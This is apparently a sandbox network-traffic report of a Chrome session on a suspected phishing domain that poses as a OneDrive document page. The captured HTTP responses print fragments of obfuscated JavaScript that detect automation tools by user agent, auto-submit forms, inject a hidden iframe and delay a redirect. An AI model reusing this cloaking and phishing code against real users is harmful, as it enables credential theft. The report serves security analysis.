                                                        2025-03-25 20:29:24 UTC1369INData Raw: 31 63 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d
                                                        Data Ascii: 1c9d<!DOCTYPE html><html><head><meta charset="utf-8" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="viewport" content="width=device-width, initial-
                                                        2025-03-25 20:29:24 UTC1369INData Raw: 37 43 69 41 67 49 43 41 67 49 43 41 67 64 6d 46 79 49 47 45 67 50 53 42 6d 64 57 35 6a 64 47 6c 76 62 69 67 70 49 48 74 30 63 6e 6c 37 63 6d 56 30 64 58 4a 75 49 43 45 68 64 32 6c 75 5a 47 39 33 4c 6d 46 6b 5a 45 56 32 5a 57 35 30 54 47 6c 7a 64 47 56 75 5a 58 4a 39 49 47 4e 68 64 47 4e 6f 4b 47 55 70 49 48 74 79 5a 58 52 31 63 6d 34 67 49 54 46 39 49 48 30 73 43 69 41 67 49 43 41 67 49 43 41 67 59 69 41 39 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 49 73 49 47 4d 70 49 48 74 68 4b 43 6b 67 50 79 42 6b 62 32 4e 31 62 57 56 75 64 43 35 68 5a 47 52 46 64 6d 56 75 64 45 78 70 63 33 52 6c 62 6d 56 79 4b 43 4a 45 54 30 31 44 62 32 35 30 5a 57 35 30 54 47 39 68 5a 47 56 6b 49 69 77 67 59 69 77 67 59 79 6b 67 4f 69 42 6b 62 32 4e 31 62 57 56 75 64 43 35 68 64 48
                                                        Data Ascii: 7CiAgICAgICAgdmFyIGEgPSBmdW5jdGlvbigpIHt0cnl7cmV0dXJuICEhd2luZG93LmFkZEV2ZW50TGlzdGVuZXJ9IGNhdGNoKGUpIHtyZXR1cm4gITF9IH0sCiAgICAgICAgYiA9IGZ1bmN0aW9uKGIsIGMpIHthKCkgPyBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCJET01Db250ZW50TG9hZGVkIiwgYiwgYykgOiBkb2N1bWVudC5hdH
                                                        2025-03-25 20:29:24 UTC1369INData Raw: 62 47 56 79 4b 58 73 76 4b 6d 4e 6f 63 6d 39 74 61 58 56 74 49 47 4a 68 63 32 56 6b 49 47 46 31 64 47 39 74 59 58 52 70 62 32 34 67 5a 48 4a 70 64 6d 56 79 4b 69 38 4b 61 57 59 6f 49 58 64 70 62 6d 52 76 64 79 35 6b 62 32 4e 31 62 57 56 75 64 43 35 6b 62 32 4e 31 62 57 56 75 64 45 56 73 5a 57 31 6c 62 6e 51 75 5a 32 56 30 51 58 52 30 63 6d 6c 69 64 58 52 6c 4b 43 4a 33 5a 57 4a 6b 63 6d 6c 32 5a 58 49 69 4b 53 6c 37 43 69 38 71 61 57 59 6f 62 6d 46 32 61 57 64 68 64 47 39 79 4c 6e 56 7a 5a 58 4a 42 5a 32 56 75 64 43 6c 37 4b 69 38 4b 61 57 59 6f 49 53 39 69 62 33 52 38 59 33 56 79 62 48 78 72 62 32 52 70 66 48 68 69 62 57 4e 38 64 32 64 6c 64 48 78 31 63 6d 78 73 61 57 4a 38 63 48 6c 30 61 47 39 75 66 48 64 70 62 6d 68 30 64 48 42 38 61 48 52 30 63 6d 46
                                                        Data Ascii: bGVyKXsvKmNocm9taXVtIGJhc2VkIGF1dG9tYXRpb24gZHJpdmVyKi8KaWYoIXdpbmRvdy5kb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuZ2V0QXR0cmlidXRlKCJ3ZWJkcml2ZXIiKSl7Ci8qaWYobmF2aWdhdG9yLnVzZXJBZ2VudCl7Ki8KaWYoIS9ib3R8Y3VybHxrb2RpfHhibWN8d2dldHx1cmxsaWJ8cHl0aG9ufHdpbmh0dHB8aHR0cmF
                                                        2025-03-25 20:29:24 UTC1369INData Raw: 57 35 6e 64 47 67 67 50 69 41 77 4b 53 42 37 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 6b 62 32 4e 31 62 57 56 75 64 43 35 6d 62 33 4a 74 63 31 73 77 58 53 35 7a 64 57 4a 74 61 58 51 6f 4b 54 73 4b 49 43 42 39 49 47 56 73 63 32 55 67 65 77 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 43 46 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 75 61 47 46 7a 61 43 6b 67 65 77 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67
                                                        Data Ascii: W5ndGggPiAwKSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkb2N1bWVudC5mb3Jtc1swXS5zdWJtaXQoKTsKICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgaWYgKCF3aW5kb3cubG9jYXRpb24uaGFzaCkgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
                                                        2025-03-25 20:29:24 UTC1369INData Raw: 41 67 49 43 41 67 49 43 42 34 61 48 52 30 63 43 35 7a 5a 58 52 53 5a 58 46 31 5a 58 4e 30 53 47 56 68 5a 47 56 79 4b 43 64 59 4c 56 4a 6c 63 58 56 6c 63 33 52 6c 5a 43 31 33 61 58 52 6f 4a 79 77 67 4a 31 68 4e 54 45 68 30 64 48 42 53 5a 58 46 31 5a 58 4e 30 4a 79 6b 37 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 68 6f 64 48 52 77 4c 6e 4e 6c 64 46 4a 6c 63 58 56 6c 63 33 52 49 5a 57 46 6b 5a 58 49 6f 4a 31 67 74 55 6d 56 78 64 57 56 7a 64 47 56 6b 4c 56 52 70 62 57 56 54 64 47 46 74 63 43 63 73 49 43 63 6e 4b 54 73 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 65 47 68 30 64 48 41 75 63 32 56 30 55 6d 56 78 64 57 56 7a 64 45 68 6c 59 57 52 6c 63
                                                        Data Ascii: AgICAgICB4aHR0cC5zZXRSZXF1ZXN0SGVhZGVyKCdYLVJlcXVlc3RlZC13aXRoJywgJ1hNTEh0dHBSZXF1ZXN0Jyk7CiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLnNldFJlcXVlc3RIZWFkZXIoJ1gtUmVxdWVzdGVkLVRpbWVTdGFtcCcsICcnKTsKICAgICAgICAgICAgICAgICAgICAgICAgeGh0dHAuc2V0UmVxdWVzdEhlYWRlc
                                                        2025-03-25 20:29:24 UTC488INData Raw: 27 69 66 72 61 6d 65 27 29 3b 61 2e 68 65 69 67 68 74 3d 31 3b 61 2e 77 69 64 74 68 3d 31 3b 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 3b 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 30 3b 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 30 3b 61 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 3d 27 6e 6f 6e 65 27 3b 61 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 27 68 69 64 64 65 6e 27 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 69 66 28 27 6c 6f 61 64 69 6e 67 27 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 29 63 28 29 3b 65 6c 73 65 20 69 66 28 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74
                                                        Data Ascii: 'iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEvent
                                                        2025-03-25 20:29:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.449725104.21.92.117443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:24 UTC1243OUTPOST /ZayUC/?email=john.smith%40microsoft.com HTTP/1.1
                                                        Host: proposaldocumentsviasecuredport.com
                                                        Connection: keep-alive
                                                        Content-Length: 22
                                                        sec-ch-ua-platform: "Windows"
                                                        X-Requested-TimeStamp-Combination:
                                                        X-Requested-TimeStamp:
                                                        X-Requested-Type-Combination: GET
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        jOTHbG-PGUIL0SGVl0fMm1ogiY0: 44282349
                                                        X-Requested-with: XMLHttpRequest
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        X-Requested-Type: GET
                                                        Content-type: application/x-www-form-urlencoded
                                                        X-Requested-TimeStamp-Expire:
                                                        Accept: */*
                                                        Origin: https://proposaldocumentsviasecuredport.com
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M
                                                        2025-03-25 20:29:24 UTC22OUTData Raw: 6e 61 6d 65 31 3d 48 65 6e 72 79 26 6e 61 6d 65 32 3d 46 6f 72 64
                                                        Data Ascii: name1=Henry&name2=Ford
                                                        2025-03-25 20:29:24 UTC1349INHTTP/1.1 204 No Content
                                                        Date: Tue, 25 Mar 2025 20:29:24 GMT
                                                        Connection: close
                                                        X-Content-Type-Options: nosniff
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        X-XSS-Protection: 1; mode=block
                                                        Set-Cookie: fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M; path=/; expires=Wed, 26-Mar-25 20:29:24 GMT; Max-Age=86400;
                                                        Set-Cookie: riUofr0n8AfLgf7hKnugHijGX0Q=1742934564; path=/; expires=Wed, 26-Mar-25 20:29:24 GMT; Max-Age=86400;
                                                        Set-Cookie: PmYLFtceC7bvtWQUj0IlMMJPtHI=1743020964; path=/; expires=Wed, 26-Mar-25 20:29:24 GMT; Max-Age=86400;
                                                        Set-Cookie: X7zD0pYRSM6DdHXP6iTHdTjmVGs=eta3_lUYomtUZ4JfPJkf_MS-Ukg; path=/; expires=Wed, 26-Mar-25 20:29:24 GMT; Max-Age=86400;
                                                        X-Frame-Options: SAMEORIGIN
                                                        Cache-Control: public, max-age=0 no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        Pragma: no-cache
                                                        Expires: 0
                                                        X-Robots-Tag: noindex, nofollow
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DBI4pFwQz1FtrdquzyW7JJgxz2I7QTrrgpfGJsrgO9V2S6QlqWt%2FjHOCMfd5%2FEMYx7eJNea4YS99ajv2eEVzb9Q5sSmu3GnI3IPGU2g2Nw0yyJpUYyzaUZHJDpVHRQiH5QS8z9azL0FRM%2FCZ4Kps0WsAQCx5gg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926129035894ed71-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-25 20:29:24 UTC221INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 30 31 31 32 34 26 6d 69 6e 5f 72 74 74 3d 31 30 31 30 31 37 26 72 74 74 5f 76 61 72 3d 32 31 33 35 34 26 73 65 6e 74 3d 37 26 72 65 63 76 3d 39 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 39 36 26 72 65 63 76 5f 62 79 74 65 73 3d 31 38 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 33 36 38 34 32 26 63 77 6e 64 3d 32 33 36 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 30 65 64 38 61 39 36 32 61 33 31 65 38 62 30 33 26 74 73 3d 31 31 35 35 26 78 3d 30 22 0d 0a 0d 0a
                                                        Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=101124&min_rtt=101017&rtt_var=21354&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2896&recv_bytes=1881&delivery_rate=36842&cwnd=236&unsent_bytes=0&cid=0ed8a962a31e8b03&ts=1155&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.44972835.190.80.1443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:24 UTC598OUTOPTIONS /report/v4?s=MdD2B%2FKtKxUf49Q%2BiEUqJPicetOC336V638UqNqvbhYY%2F1TExLbb8dagiaq8N61MpFdZX360bMTOn1ndi0QR3JziZyxEpymiRSgTx57%2Fl5pX8eC%2FLlioHYwsSYg6Qe%2Bum2P6sHQYqlxGhLcTWgmUl3BsYnOx7Q%3D%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Origin: https://proposaldocumentsviasecuredport.com
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: content-type
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:24 UTC336INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-max-age: 86400
                                                        access-control-allow-methods: OPTIONS, POST
                                                        access-control-allow-origin: *
                                                        access-control-allow-headers: content-type, content-length
                                                        date: Tue, 25 Mar 2025 20:29:24 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.449729104.21.92.117443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:24 UTC812OUTGET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1
                                                        Host: proposaldocumentsviasecuredport.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M
                                                        2025-03-25 20:29:24 UTC947INHTTP/1.1 302 Found
                                                        Date: Tue, 25 Mar 2025 20:29:24 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        location: /cdn-cgi/challenge-platform/h/b/scripts/jsd/708f7a809116/main.js?
                                                        cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=10800, public
                                                        access-control-allow-origin: *
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7R6FdHDugSNiBPcN8j3ma4dy3ljUNfc0qgm%2BktEj6%2Bk3%2F%2FrqbUIE0vwlLsLVVw1jT8AZ11M4jOBoXvLsufWfzkrpCyZwS91vnu8OMDRtbUKF8ZRqsaBwT3o6xiWDKVVwF6WVtBqg4395IXrqexCHXbwcd2RSzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 92612905986525dc-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=99005&min_rtt=98893&rtt_var=21045&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2896&recv_bytes=1384&delivery_rate=37493&cwnd=237&unsent_bytes=0&cid=92933c45058bee86&ts=256&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.44973535.190.80.1443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:24 UTC573OUTPOST /report/v4?s=MdD2B%2FKtKxUf49Q%2BiEUqJPicetOC336V638UqNqvbhYY%2F1TExLbb8dagiaq8N61MpFdZX360bMTOn1ndi0QR3JziZyxEpymiRSgTx57%2Fl5pX8eC%2FLlioHYwsSYg6Qe%2Bum2P6sHQYqlxGhLcTWgmUl3BsYnOx7Q%3D%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 444
                                                        Content-Type: application/reports+json
                                                        Origin: https://proposaldocumentsviasecuredport.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:24 UTC444OUTData Raw: 5b 7b 22 61 67 65 22 3a 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 38 31 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 39 32 2e 31 31 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 35 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 70 72 6f 70 6f 73 61 6c 64 6f 63 75 6d 65 6e 74
                                                        Data Ascii: [{"age":2,"body":{"elapsed_time":817,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.92.117","status_code":503,"type":"http.error"},"type":"network-error","url":"https://proposaldocument
                                                        2025-03-25 20:29:25 UTC214INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-allow-origin: *
                                                        vary: Origin
                                                        date: Tue, 25 Mar 2025 20:29:24 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.449736104.21.92.117443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:24 UTC1201OUTGET /ZayUC/?email=john.smith%40microsoft.com HTTP/1.1
                                                        Host: proposaldocumentsviasecuredport.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M; riUofr0n8AfLgf7hKnugHijGX0Q=1742934564; PmYLFtceC7bvtWQUj0IlMMJPtHI=1743020964; X7zD0pYRSM6DdHXP6iTHdTjmVGs=eta3_lUYomtUZ4JfPJkf_MS-Ukg
                                                        2025-03-25 20:29:25 UTC1010INHTTP/1.1 200 OK
                                                        Date: Tue, 25 Mar 2025 20:29:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        X-Content-Type-Options: nosniff
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        X-XSS-Protection: 1; mode=block
                                                        X-Robots-Tag: noindex, nofollow
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GNJv4LgTVPWDtZlN085Xm6pf7uu%2F8zIc4FuavpZokTjINQwWpJ3V8fzWwUGmMHobmYEtzdhTlGJGDJDSXVRIJxHvoat3Zd%2FmSiVYtEsl%2FXUdiWTxFC4eBcfZLLzWG0NAhNsAaPe1UiPzutrozLkuQcKdCNWmFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9261290858884283-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=105506&min_rtt=101197&rtt_var=25765&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2895&recv_bytes=1773&delivery_rate=36746&cwnd=245&unsent_bytes=0&cid=d744a74eaef9216b&ts=566&x=0"
                                                        2025-03-25 20:29:25 UTC359INData Raw: 39 33 37 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 6e 65 44 72 69 76 65 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 2f 2f 20 54 69 6d 65 20 64 65 6c 61 79 20 28 74 6f 20 70 72 65 76 65 6e 74 20 69 6d 6d 65 64 69 61 74 65 20 62 6f 74 20 61 63 74 69 76 69 74 79 29 0d 0a 20 20 20 20 6c 65 74 20
                                                        Data Ascii: 937<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><title>OneDrive</title><script type="text/javascript"> // Time delay (to prevent immediate bot activity) let
                                                        2025-03-25 20:29:25 UTC1369INData Raw: 20 54 68 69 73 20 66 75 6e 63 74 69 6f 6e 20 72 75 6e 73 20 77 68 65 6e 20 74 68 65 20 70 61 67 65 20 69 73 20 6c 6f 61 64 65 64 0d 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 69 6d 65 72 20 3d 20 73 65 74 54 69 6d 65 6f 75 74 28 65 6e 61 62 6c 65 52 65 64 69 72 65 63 74 69 6f 6e 2c 20 6d 69 6e 54 69 6d 65 29 3b 20 2f 2f 20 53 74 61 72 74 20 74 68 65 20 63 6f 75 6e 74 64 6f 77 6e 0d 0a 20 20 20 20 7d 3b 0d 0a 0d 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 65 6e 61 62 6c 65 52 65 64 69 72 65 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 2f 2f 20 4f 6e 6c 79 20 72 65 64 69 72 65 63 74 20 69 66 20 4a 61 76 61 53 63 72 69 70 74 20 72 75 6e 73 20 61 6e 64 20 6d 69
                                                        Data Ascii: This function runs when the page is loaded window.onload = function() { timer = setTimeout(enableRedirection, minTime); // Start the countdown }; function enableRedirection() { // Only redirect if JavaScript runs and mi
